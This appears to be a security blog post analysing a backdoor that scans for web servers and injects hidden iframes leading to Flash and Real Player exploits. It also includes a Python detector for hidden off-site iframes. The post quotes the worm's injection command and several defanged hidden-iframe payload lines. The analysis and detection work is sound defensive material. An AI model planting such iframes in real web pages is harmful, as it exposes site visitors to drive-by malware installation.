IFrame Injection Attacks
Attacks against web servers are en vogue nowadays. They range from mass SQL injection attacks that insert malicious JavaScript into web sites to other forms of IFrame injection attacks.
Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs and by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll and npptools.dll, which are all related to packet processing. Furthermore, two executables, 3.tmp and 6.tmp, are created.
Then the file 6.tmp is executed with the following command line parameters:
-idx 0 -ip $IP-RANGE -port 80 -insert "<iframe src="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"
The intention is that the infected machines should scan a specific network range for web servers on port 80 and then try to inject a specific IFrame into vulnerable servers.
An analysis of the injected site leads to more malware. The HTML file contains, among other things, four more IFrames:
<IFRAME src="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
<IFRAME src="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
<IFRAME src="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
<IFRAME src="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>
As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or Real Player 11. Each of these exploits tries to install additional malware.
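As an added example that is not part of the original analysis, the following Python check flags the shape of frame seen above: an iframe that is tiny (0x0, 100x1) or CSS-hidden and points off-site. A site owner can run it over served pages to spot injected frames; the sample markup, hostnames and dimensions are constructed placeholders, not the real indicators.

```python
# Flag hidden or near-invisible <iframe>s of the kind an injection worm plants
# in compromised pages. Added example, not part of the original analysis;
# sample markup below is constructed and uses placeholder hosts.
from html.parser import HTMLParser
from urllib.parse import urlparse

def _dim(value):
    """'0', '1px', '100%' -> int, or None when absent or non-numeric."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return int(digits) if digits else None

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are tiny or CSS-hidden and point off-site."""

    def __init__(self, own_host, max_dim=1):
        super().__init__(convert_charrefs=True)
        self.own_host, self.max_dim, self.findings = own_host.lower(), max_dim, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":          # HTMLParser lowercases tags already
            return
        a = {k.lower(): (v or "") for k, v in attrs}   # attribute names too
        width, height = _dim(a.get("width")), _dim(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        tiny = any(d is not None and d <= self.max_dim for d in (width, height))
        css_hidden = "display:none" in style or "visibility:hidden" in style
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if (tiny or css_hidden) and host and host != self.own_host:
            self.findings.append({"src": a["src"], "width": width,
                                  "height": height, "css_hidden": css_hidden})

def find_hidden_iframes(html, own_host):
    """Return the suspicious iframes found in `html` for a site at `own_host`."""
    parser = HiddenIframeFinder(own_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: one legitimate embed plus injected frames shaped like
# those in the analysis (0x0 and 100x1), with placeholder hosts.
SAMPLE_PAGE = """<html><body>
<iframe src="https://video.example.org/embed/1" width=640 height=360></iframe>
<iframe src="http://injected.invalid/index.htm" width=0 height=0 frameborder=0></iframe>
<IFRAME src="http://injected.invalid/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
<iframe src="http://injected.invalid/web/index.htm" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        print("suspicious iframe:", hit)
```

Same-site frames and full-size embeds are deliberately left alone, so the output is a short list of off-site frames a visitor would never see.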